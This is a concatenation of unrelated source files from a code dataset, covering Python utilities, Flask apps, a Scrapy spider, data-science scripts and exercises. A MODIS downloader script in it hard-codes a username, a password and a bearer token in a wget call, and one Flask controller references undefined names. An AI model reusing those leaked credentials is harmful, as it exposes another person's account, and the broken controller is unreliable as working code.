] | permissive | shuoli90/PAC-pred-set | 7a2c6d756f5d970102728160ca3b42d758e09285 | 430d9dcd0b9f444f9707cf803c5f61c318794f92 | refs/heads/main | 2023-06-27T15:57:46.807679 | 2021-07-27T01:20:52 | 2021-07-27T01:20:52 | 388,563,089 | 0 | 0 | Apache-2.0 | 2021-07-22T18:38:25 | 2021-07-22T18:38:24 | null | UTF-8 | Python | false | false | 90 | py | from uncertainty.util import *
from uncertainty.classification import TempScalingLearner
| [
"ggdons@gmail.com"
] | ggdons@gmail.com |
6494aa421e2601435495170fd63e0de75337f754 | c917004bdd665903338c3115bd6821fc7208242b | /workspace/Python3_Lesson12/src/addressbook.py | 72c17c0ef0d93d7f176663ab385f23b973ae1786 | [] | no_license | paulrefalo/Python-2---4 | 408ad018ccc8161b801031f8d15df2154c5d25cb | 049c654ed626e97d7fe2f8dc61d84c60f10d7558 | refs/heads/master | 2021-01-10T05:30:25.502795 | 2016-02-19T02:08:39 | 2016-02-19T02:08:39 | 52,054,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,734 | py | import configparser
from optparse import OptionParser
import shelve
config = configparser.RawConfigParser()
config.read('V:/workspace/Python3_Lesson12/src/addressbook.cfg')
shelf_location = config.get('database', 'file')
class InvalidEmail(Exception):
pass
def validate_email(email):
if '@' not in email:
raise InvalidEmail("Invalid email: "+email)
def email_add(email):
validate_email(email)
shelf = shelve.open(shelf_location)
if 'emails' not in shelf:
shelf['emails'] = []
emails = shelf['emails']
if email in emails:
message = False, 'Email "%s" already in address book' % email
else:
emails.append(email)
message = True, 'Email "%s" added to address book' % email
shelf['emails'] = emails
shelf.close()
return message
def email_delete(email):
validate_email(email)
shelf = shelve.open(shelf_location)
if 'emails' not in shelf:
shelf['emails'] = []
emails = shelf['emails']
try:
emails.remove(email)
message = True, 'Email "%s" removed from address book' % email
except ValueError:
message = False, 'Email "%s" was not in the address book' % email
shelf['emails'] = emails
shelf.close()
return message
def email_display():
shelf = shelve.open(shelf_location)
emails = shelf['emails']
shelf.close()
text = ''
for email in emails:
text += email + '\n'
return True,text
def main(options):
"routes requests"
if options.action == 'add':
return email_add(options.email)
elif options.action == 'delete':
return email_delete(options.email)
elif options.display == True:
return email_display()
if __name__ == '__main__':
shelf = shelve.open(shelf_location)
if 'emails' not in shelf:
shelf['emails'] = []
shelf.close()
parser = OptionParser()
parser.add_option('-a', '--action', dest="action", action="store",
help="requires -e option. Actions: add/delete")
parser.add_option('-e', '--email', dest="email",
action="store", help="email used in the -a option")
parser.add_option('-d', '--display', dest="display", action="store_true",
help="show all emails")
(options, args) = parser.parse_args()
#validation
if options.action and not options.email:
parser.error("option -a requires option -e")
elif options.email and not options.action:
parser.error("option -e requires option -a")
try:
print(main(options)[1])
except InvalidEmail:
parser.error("option -e requires a valid email address") | [
"paul.refalo@gmail.com"
] | paul.refalo@gmail.com |
a76ce56f356f65611bcc9250aa5fdc250c9b10f9 | 0049832c5cbee4b96189b88b51653f48decde596 | /MODIS/MOD05/downloaderv2.py | eb85762e6a024cad9673678041edb0e2a034fbf1 | [] | no_license | henockmamo54/ImageFusion | 18cf27ec4a066456c0d575696fc986814d10a7e6 | 07e88b5cb1925f54b3b3659caa2abda2bf4f3a72 | refs/heads/master | 2023-06-16T12:38:07.352623 | 2021-07-19T00:52:02 | 2021-07-19T00:52:02 | 355,720,494 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 13 10:34:52 2021
@author: Henock
"""
import os
import modapsclient
from datetime import datetime
username = "hiik324"
password = "Ecology123"
startdate="2019-08-01"
enddate="2019-12-01"
north="38.22346787684907"
south="38.18195837298332"
west="127.21710138948873"
east="127.27222505323994"
product="MOD05_L2"
collection="61"
startdate_obj = datetime.strptime(startdate, '%Y-%m-%d')
path = os.path.join("./",str(startdate_obj.year))
if not os.path.exists(path):
os.mkdir(path)
a = modapsclient.ModapsClient()
products=a.searchForFiles(products=product, startTime=startdate,
endTime=enddate, north=north,south=south,
west=west,east=east, collection=collection)
print("Products count = > ",len(products))
for p in products:
url=a.getFileUrls(p)[0]
print(p,url)
cmd=('wget --user hiik324 --password Ecology123 {0} --header "Authorization: Bearer C88B2F44-881A-11E9-B4DB-D7883D88392C" -P {1} '.format( url, path))
os.system(cmd)
| [
"henockmamo54@gmail.com"
] | henockmamo54@gmail.com |
db6863c444c7ed992ab0de7afba38e1d1466433d | 0d982772c792460c3f09da170fe80b67336bd5c5 | /nsweb/controllers/analyze.py | 83611ce625aa5f6c1c62ff9f7402e909bdacada6 | [] | no_license | tziembo/neurosynth-web | bf31c3d66fe78fc908778857ebc500440a022f2e | 8642e490ab910665d8be9b3271260dec59e0c4b2 | refs/heads/master | 2021-06-27T05:50:56.512331 | 2017-08-22T05:46:51 | 2017-08-22T05:46:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,004 | py | from flask import Blueprint, render_template, redirect, url_for, request, jsonify, abort, send_file
from nsweb.models.analyses import Analysis, AnalysisImage
from nsweb.core import app, add_blueprint, db
from nsweb.initializers import settings
from nsweb.tasks import run_metaanalysis
from nsweb.controllers.images import send_nifti
from flask.helpers import url_for
import simplejson as json
from flask.ext.user import login_required, current_user
import re
import uuid
import requests
from os.path import join, basename, exists
import os
from datetime import datetime
from email.utils import parsedate
bp = Blueprint('analyze',__name__,url_prefix='/analyze')
@bp.route('/', methods=['GET'])
def index():
return render_template('analyze/index.html.slim')
@bp.route('/<id>/', methods=['GET', 'POST'])
def show(id):
return render_template('analyze/show.html.slim')
@login_required
def run():
if 'ids' not in request.args:
abort(404) # TODO: return sensible error message
result = run_metaanalysis.delay(request.args['ids']).wait()
if result:
# Create the Analysis record
uid = uuid.uuid4().hex
name = request.args.get('name', None)
description = request.args.get('description', None)
analysis = Analysis(name=request.args['name'], description=description,
uuid=uid, ip=request.remote_addr, user=current_user)
# Add images
image_dir = join(settings.IMAGE_DIR, 'analyses')
analysis.images = [
AnalysisImage(image_file=join(image_dir, name + '_pAgF_z_FDR_0.01.nii.gz'),
label='%s: forward inference' % name,
stat='z-score',
display=1,
download=1),
AnalysisImage(image_file=join(image_dir, name + '_pFgA_z_FDR_0.01.nii.gz'),
label='%s: reverse inference' % name,
stat='z-score',
display=1,
download=1)
]
db.session.add(analysis)
db.session.commit()
# Add studies
for s in ids:
db.session.add(Inclusion(analysis=analysis, study_id=int(s)))
db.session.commit()
@bp.route('/<id>/images')
### TODO: move image retrieval from multiple controllers into a separate helper
def get_images(id):
analysis = Analysis.query.filter_by(uuid=id).first()
if analysis is None:
abort(404)
images = [{
'id': img.id,
'name': img.label,
'colorPalette': 'red' if 'reverse' in img.label else 'blue',
# "intent": (img.stat + ':').capitalize(),
'url': '/images/%s' % img.id,
'visible': 1 if 'reverse' in img.label else 0,
'download': '/images/%s' % img.id,
'intent': 'z-score'
} for img in analysis.images if img.display]
return jsonify(data=images)
@bp.route('<id>/studies')
def get_studies(id):
analysis = Analysis.query.filter_by(uuid=id).first()
if analysis is None:
abort(404)
pass
| [
"tyarkoni@gmail.com"
] | tyarkoni@gmail.com |
2264537e226c42fd49c2db1e815b60de5324216e | eddb5cc6ece559a21fb2d99dc03fb4b9e3e1ddb0 | /fagaiwei/fagaiwei/spiders/41dagongwang_sipder.py | 5bd0eebebe50b1f5a487bf89305864a737b1af3a | [] | no_license | KKtoNN/python_spider | a9bdd005d607b1265a556cb4908e84804c0bfc62 | c72bd061c3ca4145fef85b0fd9c15576441cdb09 | refs/heads/master | 2020-03-18T22:50:00.131802 | 2018-05-30T00:47:56 | 2018-05-30T00:47:56 | 135,367,902 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,688 | py | # coding:utf-8
import re
import time
import scrapy
from fagaiwei.items import FagaiweiItem
from fagaiwei.settings import session, NewsItemInfo
from fagaiwei.keyword_others import keyword
class xiamenSipderSpider(scrapy.Spider):
name = 'dagongwang_sipder'
allowed_domains = ['takungpao.com']
start_urls = [
'http://news.takungpao.com/paper/list-{}.html'.format(time.strftime("%Y%m%d", time.localtime())),
]
def parse(self, response):
pub_title = '大公报'
data_tiitle = ''.join(list(response.xpath("//div[@class='pannel_inner01']/div//text()").getall())) \
.replace('/n', '')
web2 = 'http://news.takungpao.com.hk/paper/{}.html'.format(time.strftime("%Y%m%d", time.localtime()))
url2s = response.xpath("//a[@class ='bluelink']/text()").getall()
for url2 in url2s:
item = FagaiweiItem()
param = re.search(r'第(\w+)版', url2).group(1)
url = web2 + '?' + param
result = session.query(NewsItemInfo).filter_by(url=url, web_id=41).count()
if result:
# print("PDF 文件地址: {} 存在".format(url))
pass
else:
item['url'] = url
item['title'] = pub_title + data_tiitle + param
item['content'] = '该页面为电子版报纸请点原链接查看'
item['web'] = response.url
item['webname'] = pub_title
item['pub_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
item["keyword"] = keyword.get_keyword(item["content"])
item['web_id'] = 41
yield item
| [
"18835702864@163.com"
] | 18835702864@163.com |
3cdc5787adb3028825634d327fdb2d2aa36b91b5 | 5a61ba76c770de8469218ff457213e122e08c7d1 | /code/leetcode/dynamic_programming/Solution123.py | fc2166197c3a360720c261e79b56f0cb65a9bd9a | [
"Apache-2.0"
] | permissive | zhangrong1722/interview | 6a71af26f08f036a294e36073cb9eb6ca798b993 | 187a485de0774561eb843d8ee640236adda97b90 | refs/heads/master | 2020-09-06T08:15:00.229710 | 2019-12-10T06:32:05 | 2019-12-10T06:32:05 | 220,372,777 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | class Solution:
def maxProfit(self, prices):
"""
Considering the fact we may complete at most two transactions.We can assume that first transaction is finished at i-th element.
And we just need to cosider the subarry [:i] abd [i+1: lens],where the former and the latter represent the max value for subarray[:i] and subarray[i+1:len(prices)-1]
:type prices: List[int]
:rtype: int
reference: https://leetcode.com/problems/best-time-to-buy-and-sell-stock-iii/discuss/200126/simple-c%2B%2B-DP-beats-99.66-with-explanation
"""
if len(prices) <= 1:
return 0
left = [0] * len(prices)
right = [0] * len(prices)
min_prices, max_prices = prices[0], prices[-1]
for i in range(1, len(prices)):
min_prices = min(min_prices, prices[i])
left[i] = max(prices[i]-min_prices, left[i-1])
for j in range(len(prices)-2, -1, -1):
max_prices = max(max_prices, prices[j])
right[j] = max(max_prices - prices[j], right[j+1])
results = [left[i]+right[i] for i in range(len(prices))]
return max(results) | [
"1922525328@qq.com"
] | 1922525328@qq.com |
a6f026f02000c15a466f70505538d8d0d47501fc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02264/s889112571.py | 2e212a2e0961278eca5e971a4029146c58b8aed7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from collections import deque
def process_task(task,qua, elapsed_time, complete_task):
exe_task = task.popleft()
t = int(exe_task[1])
q = int(qua)
if t-q > 0:
exe_task[1] = (t - q)
task.append(exe_task)
elapsed_time += q
else:
elapsed_time += t
complete_task.append([exe_task[0], elapsed_time])
return elapsed_time,complete_task
def main():
n,q = map(int, raw_input().split())
task = [raw_input().split() for _ in range(n)]
que = deque(task)
ela_time = 0
comp_task = []
while len(que) != 0:
ela_time , comp_task= process_task(que, q, ela_time,comp_task)
for i in comp_task:
print i[0], i[1]
#def test():
if __name__ == '__main__':
main()
#test() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b540b5f7f786c6f93344f17dad5191ffb5aa943b | f1790e298bcbf7b26cacd3c27850f243c446b9eb | /courses/python3/ch4-POO/06_lesson/encapsulation.py | 4ef417bcf9d7cecb3c934a7fb024c8b3d3026c50 | [] | no_license | misa9999/python | 36001a1bf0eb842d00b010b02e05b01aa4dfac57 | 251c5226db1bfef4a8445b025f232a27a6924930 | refs/heads/master | 2023-03-04T16:25:48.610233 | 2021-02-22T21:37:51 | 2021-02-22T21:37:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | """
public, protected, private
_ private/protected (public _)
__ private (_classname__attributename)
"""
class DataBase:
def __init__(self):
self.__data = {}
@property
def data(self):
return self.__data
def insert_customer(self, id, name):
if 'customers' not in self.__data:
self.__data['customers'] = {id: name}
else:
self.__data['customers'].update({id: name})
def show_customers(self):
for id, name in self.__data['customers'].items():
print(id, name)
def delete_customer(self, id):
del self.__data['customers'][id]
bd = DataBase()
bd.insert_customer(1, 'misa')
bd.insert_customer(2, 'lucy')
bd.insert_customer(3, 'megumin')
print(bd.data)
# bd.show_customers()
| [
"yuukixasuna00@gmailcom"
] | yuukixasuna00@gmailcom |
94de939343ae164a3702f2bf9f858e30ffc66e50 | 9276d5905d0bd4b892bccc3f3f9218124c356e59 | /tableau_view_extractor/routes.py | 0cac2c256afb2d0b2268ccd4603eb019cadb2ca2 | [] | no_license | toddbirchard/tableau-extraction | 7de813d8c547b11df13166c4bb3962b071f36602 | 0bddb8f4afe32fbef3bb6ab2c0b0076f62ca6fc4 | refs/heads/master | 2023-04-06T14:55:40.738915 | 2023-03-19T15:34:11 | 2023-03-19T15:34:11 | 162,696,737 | 19 | 2 | null | 2020-05-16T06:27:53 | 2018-12-21T09:49:26 | Python | UTF-8 | Python | false | false | 3,029 | py | import pandas as pd
from flask import Blueprint, Markup
from flask import current_app as app
from flask import render_template, request
from flask_assets import Bundle, Environment
from . import database, tableau
home_blueprint = Blueprint(
"home", __name__, template_folder="templates", static_folder="static"
)
assets = Environment(app)
js = Bundle("js/*.js", filters="jsmin", output="dist/packed.js")
scss = Bundle("scss/*.scss", filters="libsass", output="dist/all.css")
assets.register("scss_all", scss)
assets.register("js_all", js)
scss.build(force=True, disable_cache=True)
js.build(force=True, disable_cache=True)
@home_blueprint.route("/nav.jinja2", methods=["GET"])
def nav():
"""Build nav before every template render."""
tableau_view_extractor = tableau.ExtractTableauView()
xml = tableau_view_extractor.initialize_tableau_request()
token = tableau_view_extractor.get_token(xml)
all_sites = tableau_view_extractor.list_sites(token)
return render_template("nav.jinja2", all_sites=all_sites)
@home_blueprint.route("/", methods=["GET", "POST"])
def entry():
"""Homepage which lists all available views."""
tableau_view_extractor = tableau.ExtractTableauView()
xml = tableau_view_extractor.initialize_tableau_request()
token = tableau_view_extractor.get_token(xml)
site_id = tableau_view_extractor.get_site(xml, "id")
site_name = tableau_view_extractor.get_site(xml, "contentUrl")
views = tableau_view_extractor.list_views(site_id, xml, token)
all_sites = tableau_view_extractor.list_sites(token)
site = tableau_view_extractor.get_site(xml)
return render_template(
"index.jinja2",
title="Here are your views.",
template="home-template",
views=views,
token=token,
xml=xml,
site_name=site_name,
site=site,
all_sites=all_sites,
)
@home_blueprint.route("/view", methods=["GET", "POST"])
def view():
"""Display a preview of a selected view."""
site = request.args.get("site")
xml = request.args.get("xml")
view = request.args.get("view")
token = request.args.get("token")
tableau_view_extractor = tableau.ExtractTableauView()
view_df = tableau_view_extractor.get_view(site, xml, view, token)
view_df.to_csv("application/static/data/view.csv")
return render_template(
"view.jinja2",
title="Your View",
template="home-template",
view=view,
token=token,
xml=xml,
site=site,
view_df=Markup(view_df.to_html(index=False)),
)
@home_blueprint.route("/export", methods=["GET", "POST"])
def export():
"""Export view to external database."""
view_df = pd.read_csv("application/static/data/view.csv")
view_df.to_sql(
name="temp",
con=database.engine,
if_exists="replace",
chunksize=50,
index=True,
)
return render_template(
"export.jinja2",
title="Success!",
template="success-template",
)
| [
"toddbirchard@gmail.com"
] | toddbirchard@gmail.com |
be580a0a5cb16a37c9dd6cee1362c8df71b77f7d | 4495b65528bd00824a97520dee7ce22a5555ce44 | /bin/dirprinter | 48a7311fdb5989a5e1f447feede2acdc73b0498a | [] | no_license | steder/txproject | f0e7a8e57fddc454f35bc62f8273f8fb0e37f5c9 | 928d8ff40bc1b60998f6123b1b1b78f10251bf00 | refs/heads/master | 2021-01-13T02:06:45.623511 | 2015-04-13T14:17:43 | 2015-04-13T14:17:43 | 3,346,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | #!/usr/bin/env python
#-*- mode: python -*-
"""dirprinter
Pretty prints directories like this:
Example:
$ dirprinter dirname
dirname/
|-- printer.py
`-- testdir/
|-- subdir/
|-- |-- test3.txt
|-- `-- test4.txt
|-- test1.txt
`-- test2.txt
"""
import sys
from txproject import printer
from txproject import scripts
parser = scripts.getDirprinterOptionsParser(__doc__)
options, args = parser.parse_args()
if len(args) != 1:
parser.error("requires a single directory name as an argument")
path = args[0]
printer.printDirectory(path)
| [
"steder@gmail.com"
] | steder@gmail.com | |
c804374672e41fb2e779de2aa60a61a57c0ea935 | b7341581abaf2fb50e10e14911cc579e606a23d2 | /sirius_sdk/agent/wallet/abstract/non_secrets.py | a47cd8e70608d744123c602ab0e69692772ca7e1 | [
"Apache-2.0"
] | permissive | GarlonHasham/sirius-sdk-python | 3e627af6c2b3ef641b27514787fb08d0e0b30808 | 715b12c910574d78502f186aa512bc1ef5b63fbc | refs/heads/master | 2023-05-14T03:56:29.141362 | 2021-06-03T10:42:01 | 2021-06-03T10:42:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,289 | py | import json
from abc import ABC, abstractmethod
from typing import Optional, List
from sirius_sdk.base import JsonSerializable
class RetrieveRecordOptions(JsonSerializable):
def __init__(self, retrieve_type: bool=False, retrieve_value: bool=False, retrieve_tags: bool=False):
self.retrieve_type = retrieve_type
self.retrieve_value = retrieve_value
self.retrieve_tags = retrieve_tags
def check_all(self):
self.retrieve_type = True
self.retrieve_value = True
self.retrieve_tags = True
def to_json(self):
options = dict()
if self.retrieve_type:
options['retrieveType'] = self.retrieve_type
if self.retrieve_value:
options['retrieveValue'] = self.retrieve_value
if self.retrieve_tags:
options['retrieveTags'] = self.retrieve_tags
return options
def serialize(self):
return json.dumps(self.to_json())
def deserialize(self, buffer: str):
data = json.loads(buffer)
self.retrieve_type = data.get('retrieveType', False)
self.retrieve_value = data.get('retrieveValue', False)
self.retrieve_tags = data.get('retrieveTags', False)
class AbstractNonSecrets(ABC):
@abstractmethod
async def add_wallet_record(self, type_: str, id_: str, value: str, tags: dict=None) -> None:
"""
Create a new non-secret record in the wallet
:param type_: allows to separate different record types collections
:param id_: the id of record
:param value: the value of record
:param tags: the record tags used for search and storing meta information as json:
{
"tagName1": <str>, // string tag (will be stored encrypted)
"tagName2": <str>, // string tag (will be stored encrypted)
"~tagName3": <str>, // string tag (will be stored un-encrypted)
"~tagName4": <str>, // string tag (will be stored un-encrypted)
}
:return: None
"""
raise NotImplemented
@abstractmethod
async def update_wallet_record_value(self, type_: str, id_: str, value: str) -> None:
"""
Update a non-secret wallet record value
:param type_: allows to separate different record types collections
:param id_: the id of record
:param value: the value of record
:return: None
"""
raise NotImplemented
@abstractmethod
async def update_wallet_record_tags(self, type_: str, id_: str, tags: dict) -> None:
"""
Update a non-secret wallet record value
:param type_: allows to separate different record types collections
:param id_: the id of record
:param tags: ags_json: the record tags used for search and storing meta information as json:
{
"tagName1": <str>, // string tag (will be stored encrypted)
"tagName2": <str>, // string tag (will be stored encrypted)
"~tagName3": <str>, // string tag (will be stored un-encrypted)
"~tagName4": <str>, // string tag (will be stored un-encrypted)
}
:return: None
"""
raise NotImplemented
@abstractmethod
async def add_wallet_record_tags(self, type_: str, id_: str, tags: dict) -> None:
"""
Add new tags to the wallet record
:param type_: allows to separate different record types collections
:param id_: the id of record
:param tags: ags_json: the record tags used for search and storing meta information as json:
{
"tagName1": <str>, // string tag (will be stored encrypted)
"tagName2": <str>, // string tag (will be stored encrypted)
"~tagName3": <str>, // string tag (will be stored un-encrypted)
"~tagName4": <str>, // string tag (will be stored un-encrypted)
}
:return: None
"""
raise NotImplemented
@abstractmethod
async def delete_wallet_record_tags(self, type_: str, id_: str, tag_names: List[str]) -> None:
"""
Add new tags to the wallet record
:param type_: allows to separate different record types collections
:param id_: the id of record
:param tag_names: the list of tag names to remove from the record as json array: ["tagName1", "tagName2", ...]
:return: None
"""
raise NotImplemented
@abstractmethod
async def delete_wallet_record(self, type_: str, id_: str) -> None:
"""
Delete an existing wallet record in the wallet
:param type_: allows to separate different record types collections
:param id_: the id of record
:return: None
"""
raise NotImplemented
@abstractmethod
async def get_wallet_record(self, type_: str, id_: str, options: RetrieveRecordOptions) -> Optional[dict]:
"""
Get an wallet record by id
:param type_: allows to separate different record types collections
:param id_: the id of record
:param options:
{
retrieveType: (optional, false by default) Retrieve record type,
retrieveValue: (optional, true by default) Retrieve record value,
retrieveTags: (optional, true by default) Retrieve record tags
}
:return: wallet record json:
{
id: "Some id",
type: "Some type", // present only if retrieveType set to true
value: "Some value", // present only if retrieveValue set to true
tags: <tags json>, // present only if retrieveTags set to true
}
"""
raise NotImplemented
@abstractmethod
async def wallet_search(self, type_: str, query: dict, options: RetrieveRecordOptions, limit: int=1) -> (List[dict],int):
"""
Search for wallet records
:param type_: allows to separate different record types collections
:param query: MongoDB style query to wallet record tags:
{
"tagName": "tagValue",
$or: {
"tagName2": { $regex: 'pattern' },
"tagName3": { $gte: '123' },
},
}
:param options:
{
retrieveRecords: (optional, true by default) If false only "counts" will be calculated,
retrieveTotalCount: (optional, false by default) Calculate total count,
retrieveType: (optional, false by default) Retrieve record type,
retrieveValue: (optional, true by default) Retrieve record value,
retrieveTags: (optional, true by default) Retrieve record tags,
}
:param limit: max record count to retrieve
:return: wallet records json:
{
totalCount: <str>, // present only if retrieveTotalCount set to true
records: [{ // present only if retrieveRecords set to true
id: "Some id",
type: "Some type", // present only if retrieveType set to true
value: "Some value", // present only if retrieveValue set to true
tags: <tags json>, // present only if retrieveTags set to true
}],
}
"""
raise NotImplemented
| [
"minikspb@gmail.com"
] | minikspb@gmail.com |
33f0a35f5feb7df1dd4eaeaba4f463974e6e5c27 | 1d60c5a7b8ce6277bff514e376f79848f706344c | /Data Engineer with Python/02. Streamlined Data Ingestion with pandas/03. Importing Data from Databases/02. Load entire tables.py | 87520ffcb0f8e37e20dcee08416d6f66edf13411 | [] | no_license | DidiMilikina/DataCamp | 338c6e6d3b4f5b6c541c1aba155a36e9ee24949d | 3bf2cf3c1430190a7f8e54efda7d50a5fd66f244 | refs/heads/master | 2020-12-15T13:16:54.178967 | 2020-05-06T17:30:54 | 2020-05-06T17:30:54 | 235,113,616 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | '''
Load entire tables
In the last exercise, you saw that data.db has two tables. weather has historical weather data for New York City. hpd311calls is a subset of call records made to the city's 311 help line about housing issues.
In this exercise, you'll use the read_sql() function in pandas to load both tables. read_sql() accepts a string of either a SQL query to run, or a table to load. It also needs a way to connect to the database, like the engine in the provided code.
Instructions 1/2
50 XP
1
Use read_sql() to load the hpd311calls table by name, without any SQL.
2
Use read_sql() and a SELECT * ... SQL query to load the entire weather table.
'''
SOLUTION
1
# Load libraries
import pandas as pd
from sqlalchemy import create_engine
# Create the database engine
engine = create_engine('sqlite:///data.db')
# Load hpd311calls without any SQL
hpd_calls = pd.read_sql('hpd311calls', engine)
# View the first few rows of data
print(hpd_calls.head())
2
# Create the database engine
engine = create_engine("sqlite:///data.db")
# Create a SQL query to load the entire weather table
query = """
SELECT *
FROM weather;
"""
# Load weather with the SQL query
weather = pd.read_sql(query, engine)
# View the first few rows of data
print(weather.head()) | [
"didimilikina8@gmail.com"
] | didimilikina8@gmail.com |
ae630ac12f733e37781b6ebbc2773032c9f2cac5 | 88863cb16f35cd479d43f2e7852d20064daa0c89 | /DraperImageChronology/src/inv-hist-match.py | 5bc7b4f8af190bf3b43f08c71c04caa2a975ea03 | [] | no_license | chrishefele/kaggle-sample-code | 842c3cd766003f3b8257fddc4d61b919e87526c4 | 1c04e859c7376f8757b011ed5a9a1f455bd598b9 | refs/heads/master | 2020-12-29T12:18:09.957285 | 2020-12-22T20:16:35 | 2020-12-22T20:16:35 | 238,604,678 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 853 | py |
# invert histogram matching on an image
import cv2
import sys
import numpy
MAX = 255
MIN = 0
f_in = sys.argv[1]
f_out = sys.argv[2]
img_in = cv2.imread(f_in)
img_out = numpy.zeros_like(img_in)
RGB = (0,1,2)
for chan in RGB:
mean = img_in[:,:,chan].mean()
hist = cv2.calcHist([img_in], [chan], None, [256], [0,256])
hist = hist.flatten().astype(int)
lut = numpy.zeros_like(hist)
ptr = int(mean)
for i in range(int(mean), MAX+1, 1):
if hist[i] > 0:
lut[i] = ptr
ptr += 1
ptr = int(mean)-1
for i in range(int(mean)-1, MIN, -1):
if hist[i] > 0:
lut[i] = ptr
ptr -= 1
img_out[:,:,chan] = lut[ img_in[:,:,chan] ]
print "channel:", chan, "mean:", mean
print "hist:", hist
print "lut:", lut
print
cv2.imwrite(f_out, img_out)
| [
"c.hefele@verizon.net"
] | c.hefele@verizon.net |
9946676665a43725bcf984b91c4ab8323c8ddfe2 | d62cbada00caf2f7784066014a87e18052d6fa9f | /darksite/functional_tests/blog/test_list_posts.py | b8bd85d1dfcf15b689e4663ee7234a073d6f17d6 | [
"MIT"
] | permissive | UNCDarkside/DarksiteAPI | d6653990bce6b78db78efc672fde2c0ff20e4597 | a4bc1f4adee7ecfba840ad45da22513f88acbbd0 | refs/heads/master | 2020-04-11T17:36:19.062963 | 2019-01-11T03:42:31 | 2019-01-11T03:42:31 | 161,967,336 | 0 | 0 | MIT | 2019-10-22T22:09:50 | 2018-12-16T04:23:27 | Python | UTF-8 | Python | false | false | 1,311 | py | from cms.blog import models
POST_LIST_QUERY = """
query {
posts {
author {
id
name
}
content
published
rendered
slug
title
updated
}
}
"""
def test_list_posts(api_client, post_factory):
"""
Users should be able to query a list of blog posts through the
GraphQL API.
"""
# Assuming there are two posts already in the database...
post_factory(content="# Post 1", title="Post 1")
post_factory(content="# Post 2", title="Post 2")
# I would expect my response to be...
expected = []
for post in models.Post.objects.all():
expected.append(
{
"author": {
"id": str(post.author.id),
"name": post.author.name,
},
"content": post.content,
"published": post.published.isoformat(),
"rendered": post.rendered,
"slug": post.slug,
"title": post.title,
"updated": post.updated.isoformat(),
}
)
# Make the actual request
response = api_client.query(POST_LIST_QUERY)
response.raise_for_status()
# Check content
assert response.status_code == 200
assert response.json() == {"data": {"posts": expected}}
| [
"chathan@driehuys.com"
] | chathan@driehuys.com |
76c7e9f6bb07b3cce7f96db7880426f1f4f29e45 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_pursing.py | 97ccd6b1d0f43869691995232bdae3346650ddd4 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py |
from xai.brain.wordbase.nouns._purse import _PURSE
#calss header
class _PURSING(_PURSE, ):
def __init__(self,):
_PURSE.__init__(self)
self.name = "PURSING"
self.specie = 'nouns'
self.basic = "purse"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
8dfaa6138f567ae7ded66b8e50f29bf4fa670785 | 21569b68b510b55bdc2acb1ff5ae521b31d44a79 | /bin/pip | 6d43f954d84428e41a3f031821b38e7f3161f5ff | [] | no_license | howarder3/Rpi3_study | a99faef434ae4f751d4d9f339aca918186f7cb3e | 533ba60ae4d11b5e3cebc12283e067ccee5a5cfd | refs/heads/master | 2020-03-18T18:11:01.030936 | 2018-05-27T20:46:40 | 2018-05-27T20:46:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | #!/home/pi/myenv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"howarder3@gmail.com"
] | howarder3@gmail.com | |
08dfb0dd27c8af7d6a677376a9c1b968188aae7d | 9398d8433fdb29ee630a6ee43a07bc36a2adbd88 | /neutron_lbaas/drivers/radware/v2_driver.py | 3067302f452e2971128d6b9972319a601441c360 | [] | no_license | bopopescu/OpenStack_Liberty_Control | ca5a21d0c32c55dc8c517f5c7c9938ce575a4888 | 0f6ec1b4d38c47776fdf8935266bcaef2464af4c | refs/heads/master | 2022-12-03T10:41:53.210667 | 2016-03-29T06:25:58 | 2016-03-29T06:25:58 | 282,089,815 | 0 | 0 | null | 2020-07-24T01:04:15 | 2020-07-24T01:04:14 | null | UTF-8 | Python | false | false | 30,218 | py | # Copyright 2015, Radware LTD. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import netaddr
import threading
import time
from neutron.api.v2 import attributes
from neutron import context
from neutron.plugins.common import constants
from oslo_config import cfg
from oslo_log import helpers as log_helpers
from oslo_log import log as logging
from oslo_utils import excutils
from six.moves import queue as Queue
from neutron_lbaas._i18n import _LE, _LW, _LI
import neutron_lbaas.common.cert_manager
